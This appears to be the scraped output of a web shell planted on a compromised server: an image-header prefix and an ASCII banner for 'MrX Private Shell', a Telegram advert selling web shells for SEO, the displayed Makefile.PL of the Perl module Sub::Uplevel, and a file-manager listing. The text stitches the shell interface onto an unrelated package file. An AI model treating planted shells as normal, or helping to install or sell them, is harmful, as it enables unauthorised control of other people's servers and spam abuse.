����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file was automatically generated by Dist::Zilla::Plugin::MakeMaker v6.009.
use strict;
use warnings;
use 5.006;
use ExtUtils::MakeMaker 6.17;
my %WriteMakefileArgs = (
"ABSTRACT" => "apparently run a function in a higher stack frame",
"AUTHOR" => "Michael Schwern <mschwern\@cpan.org>, David Golden <dagolden\@cpan.org>",
"CONFIGURE_REQUIRES" => {
"ExtUtils::MakeMaker" => "6.17"
},
"DISTNAME" => "Sub-Uplevel",
"LICENSE" => "perl",
"MIN_PERL_VERSION" => "5.006",
"NAME" => "Sub::Uplevel",
"PREREQ_PM" => {
"Carp" => 0,
"constant" => 0,
"strict" => 0,
"warnings" => 0
},
"TEST_REQUIRES" => {
"Exporter" => 0,
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"Test::More" => 0,
"lib" => 0
},
"VERSION" => "0.2800",
"test" => {
"TESTS" => "t/*.t"
}
);
my %FallbackPrereqs = (
"Carp" => 0,
"Exporter" => 0,
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"Test::More" => 0,
"constant" => 0,
"lib" => 0,
"strict" => 0,
"warnings" => 0
);
unless ( eval { ExtUtils::MakeMaker->VERSION(6.63_03) } ) {
delete $WriteMakefileArgs{TEST_REQUIRES};
delete $WriteMakefileArgs{BUILD_REQUIRES};
$WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs;
}
delete $WriteMakefileArgs{CONFIGURE_REQUIRES}
unless eval { ExtUtils::MakeMaker->VERSION(6.52) };
WriteMakefile(%WriteMakefileArgs);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| examples | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| xt | Folder | 0755 |
|
|
| CONTRIBUTING.mkdn | File | 2.98 KB | 0644 |
|
| Changes | File | 5.5 KB | 0644 |
|
| LICENSE | File | 17.98 KB | 0644 |
|
| MANIFEST | File | 724 B | 0644 |
|
| META.json | File | 3.08 KB | 0644 |
|
| META.yml | File | 1.34 KB | 0644 |
|
| MYMETA.json | File | 3.11 KB | 0644 |
|
| MYMETA.yml | File | 1.32 KB | 0644 |
|
| Makefile | File | 29.94 KB | 0644 |
|
| Makefile.PL | File | 1.35 KB | 0644 |
|
| README | File | 5.34 KB | 0644 |
|
| cpanfile | File | 1.29 KB | 0644 |
|
| dist.ini | File | 388 B | 0644 |
|
| perlcritic.rc | File | 630 B | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|